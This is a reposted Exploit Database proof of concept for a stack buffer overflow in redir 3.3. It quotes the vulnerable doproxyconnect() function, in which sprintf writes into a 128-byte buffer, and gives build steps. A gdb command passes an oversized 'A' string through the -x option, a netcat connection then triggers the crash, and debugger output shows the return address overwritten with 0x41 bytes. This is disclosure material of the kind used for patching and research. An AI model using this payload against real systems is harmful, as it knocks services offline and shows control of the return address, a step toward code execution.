Redir 3.3 – Denial of Service (PoC)

• Exploit Database
• 125 阅读

• 作者： hieubl
  日期： 2020-01-14
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47919/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  # Exploit Title: Redir 3.3 - Denial of Service (PoC) # Date: 2020-01-14 # Exploit Author: hieubl from HPT Cyber Security # Vendor Homepage: https://github.com/troglobit/redir # Software Link: https://github.com/troglobit/redir # Version: 3.3 # Tested on: Kali GNU/Linux Rolling 2019.4 # CVE : [if applicable]   The source code of redir.c contains doproxyconnect() function which has the stack overflow vulnerability:   void doproxyconnect(int socket) { int x; char buf[128];   /* write CONNECT string to proxy */ sprintf((char *)&buf, "CONNECT %s HTTP/1.0\n\n", connect_str); x = write(socket, (char *)&buf, strlen(buf)); if (x < 1) { syslog(LOG_ERR, "Failed writing to proxy: %s", strerror(errno)); exit(1); } /* now read result */ x = read(socket, (char *)&buf, sizeof(buf)); if (x < 1) { syslog(LOG_ERR, "Failed reading reply from proxy: %s", strerror(errno)); exit(1); } /* no more error checking for now -- something should be added later */ /* HTTP/1.0 200 Connection established */ }   Download and build: # git clone https://github.com/troglobit/redir.git # cd redir # ./autogen.sh # ./configure # make   Proof of Concept: In 1st terminal: # gdb -q ./redir # set follow-fork-mode child # r -x AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :1234 hpt.vn:80   In 2nd terminal: # nc localhost 1234   After that, the program in 1st terminal will crash because of buffer overflow vulnerability. ... ► 0x5555555571b0 <doproxyconnect+144>ret<0x4141414141414141> ... Program received signal SIGSEGV (fault address 0x0) pwndbg>